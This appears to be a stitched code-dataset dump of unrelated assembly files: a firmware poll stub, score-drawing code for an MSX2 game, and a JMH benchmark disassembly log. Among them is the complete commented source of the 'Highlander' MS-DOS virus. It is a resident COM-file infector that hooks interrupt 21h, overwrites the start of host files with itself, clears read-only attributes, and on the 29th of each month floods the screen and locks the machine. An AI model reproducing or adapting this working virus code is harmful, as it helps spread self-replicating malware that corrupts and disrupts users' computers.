] | 1 | 2019-12-12T09:07:08.000Z | 2019-12-12T09:07:08.000Z | src/firmware/SunriseSunset/Poll.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
] | null | null | null | src/firmware/SunriseSunset/Poll.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
] | null | null | null | #define __CLUCK2SESAME_SUNRISESUNSET_POLL_ASM
#include "Platform.inc"
#include "TailCalls.inc"
#include "TableJumps.inc"
#include "PollChain.inc"
#include "States.inc"
radix decimal
extern POLL_AFTER_SUNRISESUNSET
SunriseSunset code
global pollSunriseSunset
global pollNextInChainAfterSunriseSunset
pollSunriseSunset:
.unknownBank
tableDefinitionToJumpWith sunriseSunsetState
createSunriseSunsetStateTable
pollNextInChainAfterSunriseSunset:
tcall POLL_AFTER_SUNRISESUNSET
end
| 19.153846 | 46 | 0.845382 |
c2c604f6cb4fdababc956276b8d439083d269990 | 9,596 | asm | Assembly | src/score.asm | fjpena/sword-of-ianna-msx2 | f104f46a677e4b21f42fbed478307a0bb1d372f3 | [
"Apache-2.0"
] | 43 | 2017-10-21T23:01:25.000Z | 2022-02-21T17:45:11.000Z | src/score.asm | fjpena/sword-of-ianna-msx2 | f104f46a677e4b21f42fbed478307a0bb1d372f3 | [
"Apache-2.0"
] | null | null | null | src/score.asm | fjpena/sword-of-ianna-msx2 | f104f46a677e4b21f42fbed478307a0bb1d372f3 | [
"Apache-2.0"
] | 6 | 2017-10-23T05:48:50.000Z | 2022-01-06T03:11:49.000Z | ; load the score area in screen
load_scorearea:
ld hl, scorearea
ld de, $D000
call unpackVRAM
ld bc, $000a
ld de, $1002
call InvalidateSTiles
; draw score status
call draw_score_status
ret
; Draw the score status
draw_score_status:
; Print barbarian status
call draw_barbarian_state
; Print current weapon
call draw_weapon
; Print enemy 1 energy (in meter and number), print enemy 1 level
ld ix, ENTITY_ENEMY1_POINTER
ld a, 24
call draw_enemy_state
; Print enemy 2 energy (in meter and number), print enemy 2 level
ld ix, ENTITY_ENEMY2_POINTER
ld a, 27
call draw_enemy_state
; Print inventory
jp draw_score_inventory
LoadScoreWeapons:
ld hl, WEAPON_SPRITES
ld de, $E000
call unpackVRAM
ld a, 3
call copyPage ; copy to VRAM page 3 (currently only used by the score area)
ret
draw_weapon:
ld a, (player_current_weapon)
rlca
rlca
rlca
rlca
rlca ; a * 32 is the X to use when drawing
ld b, 14*8
ld c, 21*8
call drawWeapon
; set the area to be invalidated
ld bc, $070a
ld de, $0202
call InvalidateSTiles
ret
draw_score_inventory:
ld a, 3
ld (currentx), a
; if (current_object > first_object + 2) first_object++
ld a, (inv_first_obj)
add a, 3
ld b, a
ld a, (inv_current_object)
cp b
jr c, draw_inv_noincfirst
ld a, (inv_first_obj)
inc a
ld (inv_first_obj), a
jr draw_inv_draw
draw_inv_noincfirst:
; else if current_object < first_object first_object --
ld a, (inv_first_obj)
ld b, a
ld a, (inv_current_object)
cp b
jr nc, draw_inv_draw
ld a, (inv_first_obj)
dec a
ld (inv_first_obj), a
draw_inv_draw:
ld a, (inv_first_obj)
draw_inv_draw_loop:
push af
cp 6
jr nc, draw_inv_draw_loop_blank
ld hl, inventory
ld e, a
ld d, 0
add hl, de
ld a, (hl) ; A has the object
and a
jr z, draw_inv_ready
sub OBJECT_KEY_GREEN ; make it base 0
ld e, a
ld d, 0
; get the stile
ld hl, tiles_per_pickable_object
add hl, de
ld a, (hl) ; A has the stile for the object
draw_inv_ready:
push af
ld a, (currentx)
add a, a
add a, a
add a, a
ld b, a
ld c, 21*8
pop af
jr draw_inv_go
draw_inv_draw_loop_blank:
ld a, (currentx)
add a, a
add a, a
add a, a
ld b, a
ld c, 21*8
xor a
draw_inv_go:
call drawTile
draw_inv_continueloop:
ld a, (currentx)
add a, 3
cp 12
jr nc, draw_inv_marker ; already drew 3 objects
ld (currentx), a ; move 3 chars right in the inventory
pop af
inc a ; next item in inventory
jp draw_inv_draw_loop
draw_inv_marker:
; cleanup the markers
ld a, ' '
ld bc, 3*256 + 23
call drawChar
ld a, ' '
ld bc, 6*256 + 23
call drawChar
ld a, ' '
ld bc, 9*256 + 23
call drawChar
; now print it
pop af
ld a, (inv_first_obj)
ld b, a
ld a, (inv_current_object)
sub b ;
ld b, a
add a, a
add a, b ; (current_obj - first_obj) * 3
add a, 3 ; 3 + (current_obj - first_obj) * 3
ld b, a
ld c, 23
ld a, 95
call drawChar
xor a
ld (inv_refresh), a
; And set the area to be redrawn
; ld bc, 2*256 + 21
; ld de, 10*256 + 3
; jp InvalidateTiles
ld bc, 1*256 + 10
ld de, 5*256 + 2
jp InvalidateSTiles
; print a meter
; INPUT:
; - B: Value (0..255)
; - C: X
; - L: color
draw_meter:
push bc
ld a, 21
ld (draw_blank), a ; just a safeguard if B=0
ld a, b
and a
jr z, draw_meter_secondhalf
ld e, b
ld d, 12
call Div8 ; Value / 12 is in the range 0..21, result in A is the number of lines to draw
and a
jr z, draw_meter_secondhalf
push af
ld d, a
ld a, 21
sub d
; inc a
ld (draw_blank), a ; draw_blank is the number of black scans to draw
pop af
ld e, a ; E = number of pixels in Y
ld d, 3 ; 6 pixels in X to fill
ld b, c ; B = starting X
inc b
inc b
inc b
ld c, a
ld a, 190
sub c ; 190 - A is the starting line
ld c, a ; C = starting Y
ld a, l ; set color
ld h, 1 ; back buffer
call fillArea_slow
draw_meter_secondhalf:
pop bc
ld a, (draw_blank)
and a
ret z ; return if no blank lines to draw
ld e, a ; E = number of pixels in Y
ld b, c ; B = starting X
inc b
inc b
inc b
ld c, 169 ; C = starting Y
ld d, 3 ; D = 3 pixels to fill in X
ld a, $11
ld h, 1 ; back buffer
jp fillArea_slow
draw_enemy_state:
ld (draw_char), a
ld a, (ix+0)
or (ix+1)
jp z, draw_enemy_noenemy
ld a, (ix+4)
and a
jp z, draw_enemy_noenemy
ld a, (ix+10)
and $f0
cp OBJECT_ENEMY_ROCK*16-OBJECT_ENEMY_SKELETON*16 ; Is this a rock?
jp z, draw_enemy_noenemy
cp OBJECT_ENEMY_SECONDARY*16-OBJECT_ENEMY_SKELETON*16 ; Is it a secondary object?
jp z, draw_enemy_noenemy
draw_enemy_enemy:
ld a, (draw_char)
rlca
rlca
rlca
ld b, a
ld c, 168
ld a, 1
call drawScoreOnOff
push ix
pop iy
call get_entity_max_energy ; so A is the maximum energy
ld c, (ix+4) ; and C is the current energy. C*256/A would be the one to use
ld h, c
ld l, 0
dec hl
ld c, a
call Div16_8 ; result in HL, we will only take L
ld b, l
ld a, (draw_char)
rlca
rlca
rlca
ld c, a
ld l, $04 ; color
call draw_meter
ld e, (ix+4)
ld d, 10
call Div8 ; A is the enemy energy / 10, D is the remainder
push de
push af
ld a, (draw_char)
inc a
ld b, a
ld c, 22
pop af
add a, '0'
call drawChar
pop de
ld a, (draw_char)
add a, 2
ld b, a
ld c, 22
ld a, d
add a, '0'
call drawChar
ld a, (ix+10)
and $0f ; the level is in the low nibble
ld d, a
ld a, (draw_char)
add a, 2
ld b, a
ld c, 23
ld a, d
add a, '1'
call drawChar
jp draw_enemy_invalidate
draw_enemy_noenemy:
ld a, (draw_char)
rlca
rlca
rlca
ld b, a
ld c, 168
xor a
call drawScoreOnOff
draw_enemy_invalidate:
; And set the area to be redrawn
ld a, (draw_char)
rrca
ld b, a
ld c, 10
ld de, 2*256+2
jp InvalidateSTiles
; ld c, 21
; ld de, 3*256 + 3
; jp InvalidateTiles
draw_barbarian_state:
; Print barbarian energy
ld ix, ENTITY_PLAYER_POINTER
push ix
pop iy
ld c, (ix+4) ; and C is the current energy. C*256/A would be the one to use
ld a, c
and a
jr nz, draw_barbarian_state_energynot0
ld b, a
jr draw_barbarian_state_energy
draw_barbarian_state_energynot0:
ld h, c
ld l, 0
dec hl
call get_entity_max_energy
ld c, a
call Div16_8 ; result in HL, we will only take L
ld b, l
draw_barbarian_state_energy:
ld c, 168
ld l, $0a
call draw_meter
; Print barbarian experience for current level
ld a, (player_experience)
and a
jr nz, draw_barbarian_state_expnot0
ld b, a
jr draw_barbarian_state_exp
draw_barbarian_state_expnot0:
ld c, a
call get_player_max_exp ; H*256/A would be the one to use
ld h, c
ld l, 0
dec hl
ld c, a
call Div16_8 ; result in HL, we will only take L
ld b, l
draw_barbarian_state_exp:
ld c, 176
ld l, $04
call draw_meter
; Print barbarian level
ld bc, 20*256 + 23
ld a, (player_level)
add a, '1'
call drawChar
; And set the area to be redrawn
; ld bc, 20*256 + 21
; ld de, 3*256 + 3
; jp InvalidateTiles
ld bc, 10*256 + 10
ld de, 2*256 + 2
jp InvalidateSTiles
; Clean score area, just leaving the outer frame
clean_scorearea:
ld c, 21 ; C is the Y tile
cleansc_y_loop:
ld b, 1 ; B is the X tile
cleansc_x_loop:
ld a, ' '
push bc
call drawChar
pop bc
inc b
ld a, b
cp 31
jr nz, cleansc_x_loop
inc c
ld a, c
cp 24
jr nz, cleansc_y_loop
ld bc, $000a ; Invalidate the whole score area
ld de, $1002
call InvalidateSTiles
call TransferDirtyTiles
ret
; Draw password for level
score_password_string_rom: db "PASSWORD:1234567890",0
score_gameover_string_en: db " PRESS FIRE",0
score_gameover_string: db " PULSA DISPARO",0
draw_gameover_string:
ld a, (language)
and a
jr z, draw_gameover_spanish
ld iy, score_gameover_string_en
jr draw_password_common
draw_gameover_spanish:
ld iy, score_gameover_string
draw_gameover_common:
jr draw_password_common
draw_password:
call ENCODE
ld de, score_password_string+9
ld a, (score_password_value)
call HEX_TO_TEXT
ld a, (score_password_value+1)
call HEX_TO_TEXT
ld a, (score_password_value+2)
call HEX_TO_TEXT
ld a, (score_password_value+3)
call HEX_TO_TEXT
ld a, (score_password_value+4)
call HEX_TO_TEXT
ld iy, score_password_string
draw_password_common:
ld a, 1
ld (score_semaphore), a ; the score area is now my precious!!!
call clean_scorearea
ld bc, 6*256+22 ; Go print string
call print_string2
ld bc, $000a ; Invalidate the whole score area
ld de, $1002
call InvalidateSTiles
call TransferDirtyTiles
call wait_till_read
call load_scorearea
xor a
ld (score_semaphore), a ; now you can do whatever you want with the score area
ld a, 2
ret
; Force an inventory redraw
force_inv_redraw:
ld a, 1
ld (inv_refresh), a
ld (frames_noredraw), a ; trick to force a redraw
call waitforVBlank
jp RedrawScreen
scorearea: INCBIN "marcador.SR5.plet1"
WEAPON_SPRITES: INCBIN "armas.SR5.plet1"
| 21.371938 | 89 | 0.627866 |
d5e4c26fa7728e5db939a1616e04505c97bdca9b | 21,310 | asm | Assembly | MSDOS/Virus.MSDOS.Unknown.highland.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | MSDOS/Virus.MSDOS.Unknown.highland.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | MSDOS/Virus.MSDOS.Unknown.highland.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
version:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
push ax ;store all registers subject to change
push bx
push cx
push es
push si
push di
push dx
push ds
push cs ;store the code segment so it can be used
push cs ;to set the ds and es registers
pop ds ;set ds to same as cs
pop es ;set es to same as cs
mov dx,080h ;set dx to offset 080h
mov ah,01ah ;set ah to create DTA
int 21h ;create DTA at 080h (normal DTA area)
pop ds ;set ds to original ds
pop dx ;set dx to original dx (ds:dx is used to
;point to the path and filename of the
;program to be executed)
push dx ;store these values back
push ds
xor cx,cx ;zero cx
mov ah,04eh ;set ah to search for filename match
int 21h ;search for filename (this is primarily
;done to setup data in the DTA so that it
;can be checked easier than making a
;number of individual calls)
push es ;store es (same as cs)
pop ds ;set ds to same as es and cs
cmp [byte 087h],'D' ;check for 'D' as seventh letter in file
jne j5
jmp endvirus ;if 'D' is 7th letter, dont infect
j5:
mov si,offset data3+0100h ;set source of bytes to compare
mov di,089h ;set destination of bytes to compare
mov cx,3 ;number of bytes to compare
cld ;compare forward
repe cmpsb ;compare bytes (check to see if file's
;extension is COM)
je j1
jmp endvirus ;not a COM file. Dont infect
j1:
mov bx,[word 009ah] ;set bx to length of file
cmp bx,1024 ;is length > 1024?
jae j2 ;yes, continue with checks
jmp endvirus ;no, dont infect
j2:
cmp bx,62000 ;is length < 62000?
jbe j3 ;yes, continue with checks
jmp endvirus ;no, dont infect
j3:
mov ax,[word 096h] ;set ax to file's time stamp
and ax,0000000000011111b ;clear everything but seconds
cmp ax,0000000000010100b ;is seconds = 40?
jne j4 ;yes, continue with infection
mov ah,02ah ;no, set ah to get the date
int 21h ;get current system date
mov cx,21 ;set cx to 21
cmp dl,29 ;is the date the 29th?
je irritate ;yes, continue with irritate
jmp endvirus ;no, let program execute normally
irritate:
mov dx,offset data5+0100h ;point dx to irritating message
mov ah,09h ;set ah to write to screen
int 21h ;write message 21 times
loop irritate
iret ;xfer program control to whatever's on
;the stack (this almost guarantee's a
;lockup and a reboot)
j4:
mov ax,[word 096h] ;set ax equal to the file's time stamp
and ax,1111111111100000b ;zero the seconds portion
or ax,0000000000010100b ;set the seconds = 40
add bx,0100h ;set bx = loc for restore routine (end
;of file once its in memory)
mov [word data1+0100h],bx ;store this value in the virus
mov bx,ax ;set bx = to adjusted time stamp
pop ds ;get the original ds
push ds ;store this value back
mov ax,04300h ;set ax to get the file's attributes
;ds:dx already points to path/filename
int 21h ;get the files attributes
push cx ;push the attributes
push bx ;push the adjusted time stamp
xor cx,cx ;zero cx(attributes for normal, read/write)
mov ax,04301h ;set ax to set file attributes
int 21h ;set files attributes to normal/read/write
mov ax,03d02h ;set ax to open file
int 21h ;open file for read/write access
mov bx,ax ;mov file handle to bx
push cs ;push current code segment
pop ds ;and pop into ds (ds=cs)
mov cx,endcode-begin ;set cx equal to length of virus
mov dx,offset endcode+0100h ;point dx to end of virus in memory
mov ah,03fh ;set ah to read from file
int 21h ;read bytes from beginning of file and
;store at end of virus. Read as many bytes
;as virus is long.
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04200h ;set ax to move file pointer from begin
int 21h ;mov file pointer to start of file
mov cx,endcode-begin ;set cx = length of virus
mov dx,0100h ;point dx to start of virus
mov ah,040h ;set ah to write to file
int 21h ;write virus to start of file
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04202h ;set ax to move file pointer from end
int 21h ;mov file pointer to end of file
mov cx,checkinfect-restcode ;set cx to length of restore routine
mov dx,offset restcode+0100h ;point dx to start of restore routine
mov ah,040h ;set ah to write to file
int 21h ;write restore routine to end of file
mov cx,endcode-begin ;set cx to length of virus (length of code
;read from beginning of file)
mov dx,offset endcode+0100h ;point dx to data read from file
mov ah,040h ;set ah to write to file
int 21h ;write data read from start of file to end
;of file following restore routine
pop cx ;pop the adjusted time stamp
mov dx,[word 098h] ;mov the file date stamp into dx
mov ax,05701h ;set ax to write time/date stamp
int 21h ;write time/date stamp to file
mov ah,03eh ;set ah to close file
int 21h ;close the file
pop cx ;pop the original attributes
pop ds ;pop the original ds
pop dx ;pop the original dx
push dx ;push these values back
push ds
mov ax,04301h ;set ax to set file attributes (ds:dx now
;points to original path/filename)
int 21h ;set the original attributes back to file
endvirus: ;virus execution complete. restore original
;values for INT 21 function
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
cont: ;virus complete. restore original flags
popf
pushf
int21trap: ;this calls the original INT 21 routine
db 09ah ;opcode for a far call
nop ;blank area. the original INT 21 vector
nop ;is copied to this area
nop
nop
push ax ;after the original INT 21 routine has
;completed execution, control is returned
;to this point
push bx
pushf ;push the flags returned from the INT 21
;routine. We have to get them in the
;proper location in the stack when we
;return to the calling program
pop ax ;pop the flags
mov bx,sp ;set bx equal to the stack pointer
mov [word ss:bx+8],ax ;copy the flags to the proper location in
;the stack
pop bx ;restore bx
pop ax ;restore ax
iret ;return to calling program
signature:
db 'dex'
endcode: ;this file has been written as if it were
;a natural infection. At this point the
;virus is ended and we are at the restore
;routine. Following this is the host code
;which will be moved back to 0100h. This
;file could never actually be a natural
;infection however due to its small size
rep movsb ;start of restore routine. move host back
push cs ;set up to xfer to cs:0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;host is restored. xfer to start of host
hoststart: ;This is the host program. It consists
;merely of a simple message being displayed
jmp skipdata ;jump over message
hostmessage:
db 'The virus is now resident.$'
skipdata:
mov ah,09h ;set ah to write to screen
mov dx,offset hostmessage+0100h
;point dx to message to display
int 21h ;display message
mov ah,04ch ;set ah to terminate program
int 21h ;terminate program, return to DOS
END
| 50.378251 | 77 | 0.548991 |
6d17f964f76aa76f74e61c68cca709164246d8ab | 136,690 | asm | Assembly | reports/16_dense_array.exp2.asm | arnaudroger/re2j-benchmark | ecfb2d6975948a1fbb53ccf101b285655b850058 | [
"MIT"
] | null | null | null | reports/16_dense_array.exp2.asm | arnaudroger/re2j-benchmark | ecfb2d6975948a1fbb53ccf101b285655b850058 | [
"MIT"
] | null | null | null | reports/16_dense_array.exp2.asm | arnaudroger/re2j-benchmark | ecfb2d6975948a1fbb53ccf101b285655b850058 | [
"MIT"
] | null | null | null | # JMH version: 1.19
# VM version: JDK 1.8.0_131, VM 25.131-b11
# VM invoker: /usr/lib/jvm/java-8-oracle/jre/bin/java
# VM options: <none>
# Warmup: 20 iterations, 1 s each
# Measurement: 20 iterations, 1 s each
# Timeout: 10 min per iteration
# Threads: 1 thread, will synchronize iterations
# Benchmark mode: Throughput, ops/time
# Benchmark: com.github.arnaudroger.re2j.Re2jFindRegex.testExp2
# Run progress: 0.00% complete, ETA 00:00:40
# Fork: 1 of 1
# Preparing profilers: LinuxPerfAsmProfiler
# Profilers consume stdout and stderr from target VM, use -v EXTRA to copy to console
# Warmup Iteration 1: 12101.077 ops/s
# Warmup Iteration 2: 20542.668 ops/s
# Warmup Iteration 3: 20547.998 ops/s
# Warmup Iteration 4: 20541.933 ops/s
# Warmup Iteration 5: 20593.040 ops/s
# Warmup Iteration 6: 20548.869 ops/s
# Warmup Iteration 7: 20573.676 ops/s
# Warmup Iteration 8: 20537.644 ops/s
# Warmup Iteration 9: 20515.529 ops/s
# Warmup Iteration 10: 20530.498 ops/s
# Warmup Iteration 11: 20553.456 ops/s
# Warmup Iteration 12: 20560.624 ops/s
# Warmup Iteration 13: 20569.537 ops/s
# Warmup Iteration 14: 20571.280 ops/s
# Warmup Iteration 15: 20498.186 ops/s
# Warmup Iteration 16: 20197.075 ops/s
# Warmup Iteration 17: 20437.804 ops/s
# Warmup Iteration 18: 19938.543 ops/s
# Warmup Iteration 19: 20467.697 ops/s
# Warmup Iteration 20: 20466.220 ops/s
Iteration 1: 20462.542 ops/s
Iteration 2: 20452.754 ops/s
Iteration 3: 20455.917 ops/s
Iteration 4: 18986.552 ops/s
Iteration 5: 20619.877 ops/s
Iteration 6: 20633.221 ops/s
Iteration 7: 20638.220 ops/s
Iteration 8: 20637.955 ops/s
Iteration 9: 20616.965 ops/s
Iteration 10: 20623.627 ops/s
Iteration 11: 20545.302 ops/s
Iteration 12: 19866.466 ops/s
Iteration 13: 19507.668 ops/s
Iteration 14: 19502.076 ops/s
Iteration 15: 19500.590 ops/s
Iteration 16: 19499.161 ops/s
Iteration 17: 19498.436 ops/s
Iteration 18: 19501.268 ops/s
Iteration 19: 19500.175 ops/s
Iteration 20: 19494.905 ops/s
# Processing profiler results: LinuxPerfAsmProfiler
Result "com.github.arnaudroger.re2j.Re2jFindRegex.testExp2":
20027.184 ±(99.9%) 500.785 ops/s [Average]
(min, avg, max) = (18986.552, 20027.184, 20638.220), stdev = 576.705
CI (99.9%): [19526.399, 20527.969] (assumes normal distribution)
Secondary result "com.github.arnaudroger.re2j.Re2jFindRegex.testExp2:·asm":
PrintAssembly processed: 194903 total address lines.
Perf output processed (skipped 23.436 seconds):
Column 1: cycles (20562 events)
Column 2: instructions (20556 events)
Hottest code regions (>10.00% "cycles" events):
....[Hottest Region 1]..............................................................................
C2, level 4, com.google.re2j.Machine::match, version 546 (1497 bytes)
0x00007eff1123e69b: or $0x1,%r9d
0x00007eff1123e69f: or $0x1,%r8d ;*ior ; - com.google.re2j.MachineInput$UTF16Input::step@41 (line 190)
; - com.google.re2j.Machine::match@96 (line 199)
0x00007eff1123e6a3: sar $0x3,%r9d ;*iand
; - com.google.re2j.Machine::match@111 (line 201)
0x00007eff1123e6a7: vmovd %xmm1,%r10d
0x00007eff1123e6ac: test %r10d,%r10d
0x00007eff1123e6af: jne 0x00007eff1123f8fd ;*ifne
; - com.google.re2j.Machine::match@115 (line 204)
0x00007eff1123e6b5: vmovd %xmm0,%ecx
0.00% 0.01% 0x00007eff1123e6b9: test %ecx,%ecx
0x00007eff1123e6bb: jl 0x00007eff1123ece1 ;*ifge
; - com.google.re2j.Utils::emptyOpContext@21 (line 179)
; - com.google.re2j.Machine::match@121 (line 205)
0x00007eff1123e6c1: mov $0x5,%r10d ;*iload_1
; - com.google.re2j.Utils::emptyOpContext@29 (line 182)
; - com.google.re2j.Machine::match@121 (line 205)
0x00007eff1123e6c7: cmp $0xa,%ecx
0x00007eff1123e6ca: je 0x00007eff1123ecfa ;*iload_0
; - com.google.re2j.Utils::emptyOpContext@39 (line 185)
; - com.google.re2j.Machine::match@121 (line 205)
0x00007eff1123e6d0: mov %ecx,%r11d
0.01% 0.01% 0x00007eff1123e6d3: add $0xffffffbf,%r11d
0x00007eff1123e6d7: cmp $0x1a,%r11d
╭ 0x00007eff1123e6db: jb 0x00007eff1123e6eb ;*if_icmple
│ ; - com.google.re2j.Utils::isWordRune@9 (line 149)
│ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ ; - com.google.re2j.Machine::match@121 (line 205)
│ 0x00007eff1123e6dd: mov %ecx,%edi
│ 0x00007eff1123e6df: add $0xffffff9f,%edi
0.01% │ 0x00007eff1123e6e2: cmp $0x1a,%edi
│ 0x00007eff1123e6e5: jae 0x00007eff1123ed03 ;*iconst_1
│ ; - com.google.re2j.Utils::isWordRune@42 (line 149)
│ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ ; - com.google.re2j.Machine::match@121 (line 205)
↘ 0x00007eff1123e6eb: or $0x10,%r10d ;*iload_2
; - com.google.re2j.Utils::emptyOpContext@63 (line 190)
; - com.google.re2j.Machine::match@121 (line 205)
0.00% 0x00007eff1123e6ef: mov %ebx,%r11d
0x00007eff1123e6f2: test %r11d,%r11d
0x00007eff1123e6f5: jne 0x00007eff1123f885 ;*aload
; - com.google.re2j.Machine::match@136 (line 211)
0.01% 0.00% 0x00007eff1123e6fb: mov %r8d,0x34(%rsp)
0.00% 0x00007eff1123e700: mov %r9d,0x28(%rsp)
0.01% 0x00007eff1123e705: mov %ecx,0x24(%rsp)
0.00% 0x00007eff1123e709: mov %r11d,0x30(%rsp)
0.00% 0.01% 0x00007eff1123e70e: mov 0x68(%rsp),%r11d
0x00007eff1123e713: and $0x4,%r11d ;*iand
; - com.google.re2j.Machine::match@147 (line 212)
0x00007eff1123e717: mov %r11d,0x38(%rsp)
0.00% 0x00007eff1123e71c: mov %r13,%r11
0x00007eff1123e71f: shl $0x3,%r11 ;*getfield q1
; - com.google.re2j.Machine::match@53 (line 192)
